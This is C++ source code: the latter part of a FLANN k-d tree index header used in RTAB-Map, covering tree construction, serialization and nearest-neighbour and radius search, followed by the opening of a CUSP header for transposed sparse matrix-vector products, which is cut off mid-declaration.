* The values used for subdivision.
*/
DistanceType divval;
/**
* Point data
*/
ElementType* point;
/**
* The child nodes.
*/
Node* child1, *child2;
Node(){
child1 = NULL;
child2 = NULL;
}
~Node() {
if (child1 != NULL) { child1->~Node(); child1 = NULL; }
if (child2 != NULL) { child2->~Node(); child2 = NULL; }
}
private:
template<typename Archive>
void serialize(Archive& ar)
{
typedef KDTreeIndex<Distance> Index;
Index* obj = static_cast<Index*>(ar.getObject());
ar & divfeat;
ar & divval;
bool leaf_node = false;
if (Archive::is_saving::value) {
leaf_node = ((child1==NULL) && (child2==NULL));
}
ar & leaf_node;
if (leaf_node) {
if (Archive::is_loading::value) {
point = obj->points_[divfeat];
}
}
if (!leaf_node) {
if (Archive::is_loading::value) {
child1 = new(obj->pool_) Node();
child2 = new(obj->pool_) Node();
}
ar & *child1;
ar & *child2;
}
}
friend struct serialization::access;
};
typedef Node* NodePtr;
typedef BranchStruct<NodePtr, DistanceType> BranchSt;
typedef BranchSt* Branch;
public:
/**
* KDTree constructor
*
* Params:
* inputData = dataset with the input features
* params = parameters passed to the kdtree algorithm
*/
KDTreeIndex(const IndexParams& params = KDTreeIndexParams(), Distance d = Distance() ) :
BaseClass(params, d), mean_(NULL), var_(NULL)
{
trees_ = get_param(index_params_,"trees",4);
}
/**
* KDTree constructor
*
* Params:
* inputData = dataset with the input features
* params = parameters passed to the kdtree algorithm
*/
KDTreeIndex(const Matrix<ElementType>& dataset, const IndexParams& params = KDTreeIndexParams(),
Distance d = Distance() ) : BaseClass(params,d ), mean_(NULL), var_(NULL)
{
trees_ = get_param(index_params_,"trees",4);
setDataset(dataset);
}
KDTreeIndex(const KDTreeIndex& other) : BaseClass(other),
trees_(other.trees_)
{
tree_roots_.resize(other.tree_roots_.size());
for (size_t i=0;i<tree_roots_.size();++i) {
copyTree(tree_roots_[i], other.tree_roots_[i]);
}
}
KDTreeIndex& operator=(KDTreeIndex other)
{
this->swap(other);
return *this;
}
/**
* Standard destructor
*/
virtual ~KDTreeIndex()
{
freeIndex();
}
BaseClass* clone() const
{
return new KDTreeIndex(*this);
}
using BaseClass::buildIndex;
void addPoints(const Matrix<ElementType>& points, float rebuild_threshold = 2)
{
assert(points.cols==veclen_);
size_t old_size = size_;
extendDataset(points);
if (rebuild_threshold>1 && size_at_build_*rebuild_threshold<size_) {
buildIndex();
}
else {
for (size_t i=old_size;i<size_;++i) {
for (int j = 0; j < trees_; j++) {
addPointToTree(tree_roots_[j], i);
}
}
}
}
flann_algorithm_t getType() const
{
return FLANN_INDEX_KDTREE;
}
template<typename Archive>
void serialize(Archive& ar)
{
ar.setObject(this);
ar & *static_cast<NNIndex<Distance>*>(this);
ar & trees_;
if (Archive::is_loading::value) {
tree_roots_.resize(trees_);
}
for (size_t i=0;i<tree_roots_.size();++i) {
if (Archive::is_loading::value) {
tree_roots_[i] = new(pool_) Node();
}
ar & *tree_roots_[i];
}
if (Archive::is_loading::value) {
index_params_["algorithm"] = getType();
index_params_["trees"] = trees_;
}
}
void saveIndex(FILE* stream)
{
serialization::SaveArchive sa(stream);
sa & *this;
}
void loadIndex(FILE* stream)
{
freeIndex();
serialization::LoadArchive la(stream);
la & *this;
}
/**
* Computes the index memory usage
* Returns: memory used by the index
*/
int usedMemory() const
{
return int(pool_.usedMemory+pool_.wastedMemory+size_*sizeof(int)); // pool memory and vind array memory
}
/**
* Find set of nearest neighbors to vec. Their indices are stored inside
* the result object.
*
* Params:
* result = the result object in which the indices of the nearest-neighbors are stored
* vec = the vector for which to search the nearest neighbors
* maxCheck = the maximum number of restarts (in a best-bin-first manner)
*/
void findNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, const SearchParams& searchParams) const
{
int maxChecks = searchParams.checks;
float epsError = 1+searchParams.eps;
if (maxChecks==FLANN_CHECKS_UNLIMITED) {
if (removed_) {
getExactNeighbors<true>(result, vec, epsError);
}
else {
getExactNeighbors<false>(result, vec, epsError);
}
}
else {
if (removed_) {
getNeighbors<true>(result, vec, maxChecks, epsError);
}
else {
getNeighbors<false>(result, vec, maxChecks, epsError);
}
}
}
#ifdef FLANN_KDTREE_MEM_OPT
/**
* Find set of nearest neighbors to vec. Their indices are stored inside
* the result object.
*
* Params:
* result = the result object in which the indices of the nearest-neighbors are stored
* vec = the vector for which to search the nearest neighbors
* maxCheck = the maximum number of restarts (in a best-bin-first manner)
*/
void findNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, const SearchParams& searchParams, Heap<BranchSt>* heap) const
{
int maxChecks = searchParams.checks;
float epsError = 1+searchParams.eps;
if (maxChecks==FLANN_CHECKS_UNLIMITED) {
if (removed_) {
getExactNeighbors<true>(result, vec, epsError);
}
else {
getExactNeighbors<false>(result, vec, epsError);
}
}
else {
if (removed_) {
getNeighbors<true>(result, vec, maxChecks, epsError, heap);
}
else {
getNeighbors<false>(result, vec, maxChecks, epsError, heap);
}
}
}
/**
* @brief Perform k-nearest neighbor search
* @param[in] queries The query points for which to find the nearest neighbors
* @param[out] indices The indices of the nearest neighbors found
* @param[out] dists Distances to the nearest neighbors found
* @param[in] knn Number of nearest neighbors to return
* @param[in] params Search parameters
*/
virtual int knnSearch(const Matrix<ElementType>& queries,
Matrix<size_t>& indices,
Matrix<DistanceType>& dists,
size_t knn,
const SearchParams& params) const
{
assert(queries.cols == veclen_);
assert(indices.rows >= queries.rows);
assert(dists.rows >= queries.rows);
assert(indices.cols >= knn);
assert(dists.cols >= knn);
bool use_heap;
if (params.use_heap==FLANN_Undefined) {
use_heap = (knn>KNN_HEAP_THRESHOLD)?true:false;
}
else {
use_heap = (params.use_heap==FLANN_True)?true:false;
}
int count = 0;
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
if (use_heap) {
//#pragma omp parallel num_threads(params.cores)
{
KNNResultSet2<DistanceType> resultSet(knn);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = std::min(resultSet.size(), knn);
resultSet.copy(indices[i], dists[i], n, params.sorted);
indices_to_ids(indices[i], indices[i], n);
count += n;
}
}
}
else {
//#pragma omp parallel num_threads(params.cores)
{
KNNSimpleResultSet<DistanceType> resultSet(knn);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = std::min(resultSet.size(), knn);
resultSet.copy(indices[i], dists[i], n, params.sorted);
indices_to_ids(indices[i], indices[i], n);
count += n;
}
}
}
delete heap;
return count;
}
/**
* @brief Perform k-nearest neighbor search
* @param[in] queries The query points for which to find the nearest neighbors
* @param[out] indices The indices of the nearest neighbors found
* @param[out] dists Distances to the nearest neighbors found
* @param[in] knn Number of nearest neighbors to return
* @param[in] params Search parameters
*/
virtual int knnSearch(const Matrix<ElementType>& queries,
std::vector< std::vector<size_t> >& indices,
std::vector<std::vector<DistanceType> >& dists,
size_t knn,
const SearchParams& params) const
{
assert(queries.cols == veclen_);
bool use_heap;
if (params.use_heap==FLANN_Undefined) {
use_heap = (knn>KNN_HEAP_THRESHOLD)?true:false;
}
else {
use_heap = (params.use_heap==FLANN_True)?true:false;
}
if (indices.size() < queries.rows ) indices.resize(queries.rows);
if (dists.size() < queries.rows ) dists.resize(queries.rows);
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
int count = 0;
if (use_heap) {
//#pragma omp parallel num_threads(params.cores)
{
KNNResultSet2<DistanceType> resultSet(knn);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = std::min(resultSet.size(), knn);
indices[i].resize(n);
dists[i].resize(n);
if (n>0) {
resultSet.copy(&indices[i][0], &dists[i][0], n, params.sorted);
indices_to_ids(&indices[i][0], &indices[i][0], n);
}
count += n;
}
}
}
else {
//#pragma omp parallel num_threads(params.cores)
{
KNNSimpleResultSet<DistanceType> resultSet(knn);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = std::min(resultSet.size(), knn);
indices[i].resize(n);
dists[i].resize(n);
if (n>0) {
resultSet.copy(&indices[i][0], &dists[i][0], n, params.sorted);
indices_to_ids(&indices[i][0], &indices[i][0], n);
}
count += n;
}
}
}
delete heap;
return count;
}
/**
* @brief Perform radius search
* @param[in] query The query point
* @param[out] indices The indices of the neighbors found within the given radius
* @param[out] dists The distances to the nearest neighbors found
* @param[in] radius The radius used for search
* @param[in] params Search parameters
* @return Number of neighbors found
*/
virtual int radiusSearch(const Matrix<ElementType>& queries,
Matrix<size_t>& indices,
Matrix<DistanceType>& dists,
float radius,
const SearchParams& params) const
{
assert(queries.cols == veclen_);
int count = 0;
size_t num_neighbors = std::min(indices.cols, dists.cols);
int max_neighbors = params.max_neighbors;
if (max_neighbors<0) max_neighbors = num_neighbors;
else max_neighbors = std::min(max_neighbors,(int)num_neighbors);
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
if (max_neighbors==0) {
//#pragma omp parallel num_threads(params.cores)
{
CountRadiusResultSet<DistanceType> resultSet(radius);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
count += resultSet.size();
}
}
}
else {
// explicitly indicated to use unbounded radius result set
// and we know there'll be enough room for resulting indices and dists
if (params.max_neighbors<0 && (num_neighbors>=this->size())) {
//#pragma omp parallel num_threads(params.cores)
{
RadiusResultSet<DistanceType> resultSet(radius);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = resultSet.size();
count += n;
if (n>num_neighbors) n = num_neighbors;
resultSet.copy(indices[i], dists[i], n, params.sorted);
// mark the next element in the output buffers as unused
if (n<indices.cols) indices[i][n] = size_t(-1);
if (n<dists.cols) dists[i][n] = std::numeric_limits<DistanceType>::infinity();
indices_to_ids(indices[i], indices[i], n);
}
}
}
else {
// number of neighbors limited to max_neighbors
//#pragma omp parallel num_threads(params.cores)
{
KNNRadiusResultSet<DistanceType> resultSet(radius, max_neighbors);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = resultSet.size();
count += n;
if ((int)n>max_neighbors) n = max_neighbors;
resultSet.copy(indices[i], dists[i], n, params.sorted);
// mark the next element in the output buffers as unused
if (n<indices.cols) indices[i][n] = size_t(-1);
if (n<dists.cols) dists[i][n] = std::numeric_limits<DistanceType>::infinity();
indices_to_ids(indices[i], indices[i], n);
}
}
}
}
delete heap;
return count;
}
/**
* @brief Perform radius search
* @param[in] query The query point
* @param[out] indices The indices of the neighbors found within the given radius
* @param[out] dists The distances to the nearest neighbors found
* @param[in] radius The radius used for search
* @param[in] params Search parameters
* @return Number of neighbors found
*/
virtual int radiusSearch(const Matrix<ElementType>& queries,
std::vector< std::vector<size_t> >& indices,
std::vector<std::vector<DistanceType> >& dists,
float radius,
const SearchParams& params) const
{
assert(queries.cols == veclen_);
int count = 0;
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
// just count neighbors
if (params.max_neighbors==0) {
//#pragma omp parallel num_threads(params.cores)
{
CountRadiusResultSet<DistanceType> resultSet(radius);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
count += resultSet.size();
}
}
}
else {
if (indices.size() < queries.rows ) indices.resize(queries.rows);
if (dists.size() < queries.rows ) dists.resize(queries.rows);
if (params.max_neighbors<0) {
// search for all neighbors
//#pragma omp parallel num_threads(params.cores)
{
RadiusResultSet<DistanceType> resultSet(radius);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = resultSet.size();
count += n;
indices[i].resize(n);
dists[i].resize(n);
if (n > 0) {
resultSet.copy(&indices[i][0], &dists[i][0], n, params.sorted);
indices_to_ids(&indices[i][0], &indices[i][0], n);
}
}
}
}
else {
// number of neighbors limited to max_neighbors
//#pragma omp parallel num_threads(params.cores)
{
KNNRadiusResultSet<DistanceType> resultSet(radius, params.max_neighbors);
//#pragma omp for schedule(static) reduction(+:count)
for (int i = 0; i < (int)queries.rows; i++) {
resultSet.clear();
findNeighbors(resultSet, queries[i], params, heap);
size_t n = resultSet.size();
count += n;
if ((int)n>params.max_neighbors) n = params.max_neighbors;
indices[i].resize(n);
dists[i].resize(n);
if (n > 0) {
resultSet.copy(&indices[i][0], &dists[i][0], n, params.sorted);
indices_to_ids(&indices[i][0], &indices[i][0], n);
}
}
}
}
}
delete heap;
return count;
}
#endif
protected:
/**
* Builds the index
*/
void buildIndexImpl()
{
// Create a permutable array of indices to the input vectors.
std::vector<int> ind(size_);
for (size_t i = 0; i < size_; ++i) {
ind[i] = int(i);
}
mean_ = new DistanceType[veclen_];
var_ = new DistanceType[veclen_];
tree_roots_.resize(trees_);
/* Construct the randomized trees. */
for (int i = 0; i < trees_; i++) {
/* Randomize the order of vectors to allow for unbiased sampling. */
std::random_shuffle(ind.begin(), ind.end());
tree_roots_[i] = divideTree(&ind[0], int(size_) );
}
delete[] mean_;
delete[] var_;
}
void freeIndex()
{
for (size_t i=0;i<tree_roots_.size();++i) {
// using placement new, so call destructor explicitly
if (tree_roots_[i]!=NULL) tree_roots_[i]->~Node();
}
pool_.free();
}
private:
void copyTree(NodePtr& dst, const NodePtr& src)
{
dst = new(pool_) Node();
dst->divfeat = src->divfeat;
dst->divval = src->divval;
if (src->child1==NULL && src->child2==NULL) {
dst->point = points_[dst->divfeat];
dst->child1 = NULL;
dst->child2 = NULL;
}
else {
copyTree(dst->child1, src->child1);
copyTree(dst->child2, src->child2);
}
}
/**
* Create a tree node that subdivides the list of vectors from ind[0]
* to ind[count-1]. The routine is called recursively on each sublist.
*
* Params: ind = array of indices of the vectors to subdivide
* count = number of indices in the array
*/
NodePtr divideTree(int* ind, int count)
{
NodePtr node = new(pool_) Node(); // allocate memory
/* If too few exemplars remain, then make this a leaf node. */
if (count == 1) {
node->child1 = node->child2 = NULL; /* Mark as leaf node. */
node->divfeat = *ind; /* Store index of this vec. */
node->point = points_[*ind];
}
else {
int idx;
int cutfeat;
DistanceType cutval;
meanSplit(ind, count, idx, cutfeat, cutval);
node->divfeat = cutfeat;
node->divval = cutval;
node->child1 = divideTree(ind, idx);
node->child2 = divideTree(ind+idx, count-idx);
}
return node;
}
/**
* Choose which feature to use in order to subdivide this set of vectors.
* Make a random choice among those with the highest variance, and use
* its variance as the threshold value.
*/
void meanSplit(int* ind, int count, int& index, int& cutfeat, DistanceType& cutval)
{
memset(mean_,0,veclen_*sizeof(DistanceType));
memset(var_,0,veclen_*sizeof(DistanceType));
/* Compute mean values. Only the first SAMPLE_MEAN values need to be
sampled to get a good estimate.
*/
int cnt = std::min((int)SAMPLE_MEAN+1, count);
for (int j = 0; j < cnt; ++j) {
ElementType* v = points_[ind[j]];
for (size_t k=0; k<veclen_; ++k) {
mean_[k] += v[k];
}
}
DistanceType div_factor = DistanceType(1)/cnt;
for (size_t k=0; k<veclen_; ++k) {
mean_[k] *= div_factor;
}
/* Compute variances (no need to divide by count). */
for (int j = 0; j < cnt; ++j) {
ElementType* v = points_[ind[j]];
for (size_t k=0; k<veclen_; ++k) {
DistanceType dist = v[k] - mean_[k];
var_[k] += dist * dist;
}
}
/* Select one of the highest variance indices at random. */
cutfeat = selectDivision(var_);
cutval = mean_[cutfeat];
int lim1, lim2;
planeSplit(ind, count, cutfeat, cutval, lim1, lim2);
if (lim1>count/2) index = lim1;
else if (lim2<count/2) index = lim2;
else index = count/2;
/* If either list is empty, it means that all remaining features
* are identical. Split in the middle to maintain a balanced tree.
*/
if ((lim1==count)||(lim2==0)) index = count/2;
}
/**
* Select the top RAND_DIM largest values from v and return the index of
* one of these selected at random.
*/
int selectDivision(DistanceType* v)
{
int num = 0;
size_t topind[RAND_DIM];
/* Create a list of the indices of the top RAND_DIM values. */
for (size_t i = 0; i < veclen_; ++i) {
if ((num < RAND_DIM)||(v[i] > v[topind[num-1]])) {
/* Put this element at end of topind. */
if (num < RAND_DIM) {
topind[num++] = i; /* Add to list. */
}
else {
topind[num-1] = i; /* Replace last element. */
}
/* Bubble end value down to right location by repeated swapping. */
int j = num - 1;
while (j > 0 && v[topind[j]] > v[topind[j-1]]) {
std::swap(topind[j], topind[j-1]);
--j;
}
}
}
/* Select a random integer in range [0,num-1], and return that index. */
int rnd = rand_int(num);
return (int)topind[rnd];
}
/**
* Subdivide the list of points by a plane perpendicular to the axis corresponding
* to the 'cutfeat' dimension at 'cutval' position.
*
* On return:
* dataset[ind[0..lim1-1]][cutfeat]<cutval
* dataset[ind[lim1..lim2-1]][cutfeat]==cutval
* dataset[ind[lim2..count-1]][cutfeat]>cutval
*/
void planeSplit(int* ind, int count, int cutfeat, DistanceType cutval, int& lim1, int& lim2)
{
/* Move vector indices for left subtree to front of list. */
int left = 0;
int right = count-1;
for (;; ) {
while (left<=right && points_[ind[left]][cutfeat]<cutval) ++left;
while (left<=right && points_[ind[right]][cutfeat]>=cutval) --right;
if (left>right) break;
std::swap(ind[left], ind[right]); ++left; --right;
}
lim1 = left;
right = count-1;
for (;; ) {
while (left<=right && points_[ind[left]][cutfeat]<=cutval) ++left;
while (left<=right && points_[ind[right]][cutfeat]>cutval) --right;
if (left>right) break;
std::swap(ind[left], ind[right]); ++left; --right;
}
lim2 = left;
}
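/* Worked example (a sketch): splitting the values {5,2,7,2,9} on cutval=5
* reorders them to {2,2,5,7,9}, giving lim1=2 (values < 5) and lim2=3
* (values == 5), with values > 5 from lim2 onwards, matching the ranges
* documented above.
*/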
/**
* Performs an exact nearest neighbor search. The exact search performs a full
* traversal of the tree.
*/
template<bool with_removed>
void getExactNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, float epsError) const
{
// checkID -= 1; /* Set a different unique ID for each search. */
if (trees_ > 1) {
fprintf(stderr,"It doesn't make any sense to use more than one tree for exact search");
}
if (trees_>0) {
searchLevelExact<with_removed>(result, vec, tree_roots_[0], 0.0, epsError);
}
}
/**
* Performs the approximate nearest-neighbor search. The search is approximate
* because the tree traversal is abandoned after a given number of descents in
* the tree.
*/
template<bool with_removed>
void getNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, int maxCheck, float epsError) const
{
int i;
BranchSt branch;
int checkCount = 0;
Heap<BranchSt>* heap = new Heap<BranchSt>((int)size_);
DynamicBitset checked(size_);
/* Search once through each tree down to root. */
for (i = 0; i < trees_; ++i) {
searchLevel<with_removed>(result, vec, tree_roots_[i], 0, checkCount, maxCheck, epsError, heap, checked);
}
/* Keep searching other branches from heap until finished. */
while ( heap->popMin(branch) && (checkCount < maxCheck || !result.full() )) {
searchLevel<with_removed>(result, vec, branch.node, branch.mindist, checkCount, maxCheck, epsError, heap, checked);
}
delete heap;
}
#ifdef FLANN_KDTREE_MEM_OPT
/**
* Performs the approximate nearest-neighbor search. The search is approximate
* because the tree traversal is abandoned after a given number of descents in
* the tree.
*/
template<bool with_removed>
void getNeighbors(ResultSet<DistanceType>& result, const ElementType* vec, int maxCheck, float epsError, Heap<BranchSt>* heap) const
{
int i;
BranchSt branch;
int checkCount = 0;
DynamicBitset checked(size_);
heap->clear();
/* Search once through each tree down to root. */
for (i = 0; i < trees_; ++i) {
searchLevel<with_removed>(result, vec, tree_roots_[i], 0, checkCount, maxCheck, epsError, heap, checked);
}
/* Keep searching other branches from heap until finished. */
while ( heap->popMin(branch) && (checkCount < maxCheck || !result.full() )) {
searchLevel<with_removed>(result, vec, branch.node, branch.mindist, checkCount, maxCheck, epsError, heap, checked);
}
}
#endif
/**
* Search starting from a given node of the tree. Based on any mismatches at
* higher levels, all exemplars below this level must have a distance of
* at least "mindist".
*/
template<bool with_removed>
void searchLevel(ResultSet<DistanceType>& result_set, const ElementType* vec, NodePtr node, DistanceType mindist, int& checkCount, int maxCheck,
float epsError, Heap<BranchSt>* heap, DynamicBitset& checked) const
{
if (result_set.worstDist()<mindist) {
// printf("Ignoring branch, too far\n");
return;
}
/* If this is a leaf node, then do check and return. */
if ((node->child1 == NULL)&&(node->child2 == NULL)) {
int index = node->divfeat;
if (with_removed) {
if (removed_points_.test(index)) return;
}
/* Do not check same node more than once when searching multiple trees. */
if ( checked.test(index) || ((checkCount>=maxCheck)&& result_set.full()) ) return;
checked.set(index);
checkCount++;
DistanceType dist = distance_(node->point, vec, veclen_);
result_set.addPoint(dist,index);
return;
}
/* Which child branch should be taken first? */
ElementType val = vec[node->divfeat];
DistanceType diff = val - node->divval;
NodePtr bestChild = (diff < 0) ? node->child1 : node->child2;
NodePtr otherChild = (diff < 0) ? node->child2 : node->child1;
/* Create a branch record for the branch not taken. Add distance
of this feature boundary (we don't attempt to correct for any
use of this feature in a parent node, which is unlikely to
happen and would have only a small effect). Don't bother
adding more branches to heap after halfway point, as cost of
adding exceeds their value.
*/
DistanceType new_distsq = mindist + distance_.accum_dist(val, node->divval, node->divfeat);
// if (2 * checkCount < maxCheck || !result.full()) {
if ((new_distsq*epsError < result_set.worstDist())|| !result_set.full()) {
heap->insert( BranchSt(otherChild, new_distsq) );
}
/* Call recursively to search next level down. */
searchLevel<with_removed>(result_set, vec, bestChild, mindist, checkCount, maxCheck, epsError, heap, checked);
}
/**
* Performs an exact search in the tree starting from a node.
*/
template<bool with_removed>
void searchLevelExact(ResultSet<DistanceType>& result_set, const ElementType* vec, const NodePtr node, DistanceType mindist, const float epsError) const
{
/* If this is a leaf node, then do check and return. */
if ((node->child1 == NULL)&&(node->child2 == NULL)) {
int index = node->divfeat;
if (with_removed) {
if (removed_points_.test(index)) return; // ignore removed points
}
DistanceType dist = distance_(node->point, vec, veclen_);
result_set.addPoint(dist,index);
return;
}
/* Which child branch should be taken first? */
ElementType val = vec[node->divfeat];
DistanceType diff = val - node->divval;
NodePtr bestChild = (diff < 0) ? node->child1 : node->child2;
NodePtr otherChild = (diff < 0) ? node->child2 : node->child1;
/* Create a branch record for the branch not taken. Add distance
of this feature boundary (we don't attempt to correct for any
use of this feature in a parent node, which is unlikely to
happen and would have only a small effect). Don't bother
adding more branches to heap after halfway point, as cost of
adding exceeds their value.
*/
DistanceType new_distsq = mindist + distance_.accum_dist(val, node->divval, node->divfeat);
/* Call recursively to search next level down. */
searchLevelExact<with_removed>(result_set, vec, bestChild, mindist, epsError);
if (mindist*epsError<=result_set.worstDist()) {
searchLevelExact<with_removed>(result_set, vec, otherChild, new_distsq, epsError);
}
}
void addPointToTree(NodePtr node, int ind)
{
ElementType* point = points_[ind];
if ((node->child1==NULL) && (node->child2==NULL)) {
ElementType* leaf_point = node->point;
ElementType max_span = 0;
size_t div_feat = 0;
for (size_t i=0;i<veclen_;++i) {
ElementType span = std::abs(point[i]-leaf_point[i]);
if (span > max_span) {
max_span = span;
div_feat = i;
}
}
NodePtr left = new(pool_) Node();
left->child1 = left->child2 = NULL;
NodePtr right = new(pool_) Node();
right->child1 = right->child2 = NULL;
if (point[div_feat]<leaf_point[div_feat]) {
left->divfeat = ind;
left->point = point;
right->divfeat = node->divfeat;
right->point = node->point;
}
else {
left->divfeat = node->divfeat;
left->point = node->point;
right->divfeat = ind;
right->point = point;
}
node->divfeat = div_feat;
node->divval = (point[div_feat]+leaf_point[div_feat])/2;
node->child1 = left;
node->child2 = right;
}
else {
if (point[node->divfeat]<node->divval) {
addPointToTree(node->child1,ind);
}
else {
addPointToTree(node->child2,ind);
}
}
}
private:
void swap(KDTreeIndex& other)
{
BaseClass::swap(other);
std::swap(trees_, other.trees_);
std::swap(tree_roots_, other.tree_roots_);
std::swap(pool_, other.pool_);
}
private:
enum
{
/**
* To improve efficiency, only SAMPLE_MEAN random values are used to
* compute the mean and variance at each level when building a tree.
* A value of 100 seems to perform as well as using all values.
*/
SAMPLE_MEAN = 100,
/**
* Top random dimensions to consider
*
* When creating random trees, the dimension on which to subdivide is
* selected at random from among the top RAND_DIM dimensions with the
* highest variance. A value of 5 works well.
*/
RAND_DIM=5
};
/**
* Number of randomized trees that are used
*/
int trees_;
DistanceType* mean_;
DistanceType* var_;
/**
* Array of k-d trees used to find neighbours.
*/
std::vector<NodePtr> tree_roots_;
/**
* Pooled memory allocator.
*
* Using a pooled memory allocator is more efficient
* than allocating memory directly when there is a large
* number of small memory allocations.
*/
PooledAllocator pool_;
USING_BASECLASS_SYMBOLS
}; // class KDTreeIndex
}
#endif //RTABMAP_FLANN_KDTREE_INDEX_H_
|
transposed_spmv.h | /*
* Copyright 2014-2015 The University of Queensland
* http://www.uq.edu.au
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
#include <thrust/functional.h>
#include <cusp/detail/functional.h>
#ifndef DIA_CHUNKSIZE
#define DIA_CHUNKSIZE 1024
#endif
namespace cusp
{
namespace detail
{
namespace host
{
/////////////////////////
// DIA transposed SpMV //
/////////////////////////
template <typename Matrix,
typename Vector1,
typename Vector2,
typename UnaryFunction,
typename BinaryFunction1,
typename BinaryFunction2>
void transposed_spmv_dia(const Matrix& A,
const Vector1& x,
Vector2& y,
UnaryFunction initialize,
BinaryFunction1 combine,
BinaryFunction2 reduce)
{
typedef typename Matrix::index_type IndexType;
//typedef typename Vector2::value_type ValueType;
const size_t num_diagonals = A.values.num_cols;
#pragma omp parallel for
for (size_t ch = 0; ch < A.num_cols; ch += DIA_CHUNKSIZE) {
// initialize chunk
for (size_t row = ch; row < std::min(ch+DIA_CHUNKSIZE,A.num_cols); row++)
{
y[row] = initialize(y[row]);
}
// for each diagonal
for (size_t d = 0; d < num_diagonals; d++)
{
for (IndexType row=ch; row<std::min(ch+DIA_CHUNKSIZE,A.num_cols); row++)
{
const IndexType col = row - A.diagonal_offsets[d];
if (col >= 0 && col < A.num_rows)
{
y[row] = reduce(y[row], combine(A.values(col, d), x[col]));
}
}
}
}
}
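/*
 * Worked example of the transposed indexing above. In an ordinary DIA
 * product, row i accumulates values(i,d) * x[i + offset[d]]. For y = A^T x
 * the entry values(i,d) instead contributes to output row i + offset[d];
 * solving for the source row gives col = row - offset[d], which is the
 * bounds-checked index used in the loop. E.g. with offset[d] = 1 (the
 * superdiagonal) and row = 5, the contribution is values(4,d) * x[4].
 */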
template <typename Matrix,
typename Vector1,
typename Vector2>
void transposed_spmv_dia(const Matrix& A,
const Vector1& x,
Vector2& y)
{
typedef typename Vector2::value_type ValueType;
transposed_spmv_dia(A, x, y,
cusp::detail::zero_function<ValueType>(),
thrust::multiplies<ValueType>(),
thrust::plus<ValueType>());
}
template <typename Matrix,
typename Vector1,
typename Vector2,
typename UnaryFunction,
typename BinaryFunction1,
typename BinaryFunction2>
void transposed_spmv_cds(const Matrix& A,
const Vector1& x,
Vector2& y,
UnaryFunction initialize,
BinaryFunction1 combine,
BinaryFunction2 reduce)
{
typedef typename Matrix::index_type IndexType;
typedef typename Vector2::value_type ValueType;
const IndexType num_diagonals = A.diagonal_offsets.size();
const IndexType block_size = (IndexType)A.block_size;
const IndexType num_cols = (IndexType)A.num_cols;
// make chunksize a multiple of block_size
const IndexType chunksize = block_size*(DIA_CHUNKSIZE/block_size);
// optimisation for special case
if (block_size == 2) {
#pragma omp parallel for
for (IndexType ch = 0; ch < num_cols; ch += chunksize) {
for (IndexType row = ch; row < std::min(ch+chunksize,num_cols); row+=2)
{
ValueType sum1 = initialize(y[row]);
ValueType sum2 = initialize(y[row+1]);
// for each diagonal block
for (IndexType d = 0; d < num_diagonals; d++)
{
const IndexType col = row - A.diagonal_offsets[d]*2;
if (col >= 0 && col < A.num_rows)
{
sum1 = reduce(sum1, combine(A.values(col, 2*d), x[col]));
sum2 = reduce(sum2, combine(A.values(col, 2*d+1),x[col]));
sum1 = reduce(sum1, combine(A.values(col+1, 2*d), x[col+1]));
sum2 = reduce(sum2, combine(A.values(col+1, 2*d+1),x[col+1]));
}
}
y[row] = sum1;
y[row+1] = sum2;
}
}
} else { // block_size!=2
#pragma omp parallel for
for (IndexType ch = 0; ch < num_cols; ch += chunksize) {
for (IndexType row = ch; row < std::min(ch+chunksize,num_cols); row++)
{
y[row] = initialize(y[row]);
// for each diagonal block
for (IndexType d = 0; d < num_diagonals; d++)
{
const IndexType k = A.diagonal_offsets[d]*block_size;
const IndexType col = block_size*(row/block_size) - k;
if (col >= 0 && col <= A.num_rows-block_size)
{
// for each column in block
for (IndexType i = 0; i < block_size; i++)
{
const ValueType& Aij = A.values(col+i, d*block_size+row%block_size);
const ValueType& xj = x[col + i];
y[row] = reduce(y[row], combine(Aij, xj));
}
}
} // diagonals
} // rows
} // chunks
} // block_size
}
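/*
 * Block-diagonal indexing example for the general case above. Offsets are
 * stored in units of blocks, so a block offset k_b corresponds to the
 * scalar offset k = k_b*block_size. For block_size = 3, row = 7, k_b = 1:
 * k = 3, the row's block starts at block_size*(row/block_size) = 6, and
 * col = 6 - 3 = 3, so the entries x[3..5] are combined into y[7] via
 * A.values(col+i, d*block_size + row%block_size) for i = 0..2.
 */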
template <typename Matrix,
typename Vector1,
typename Vector2>
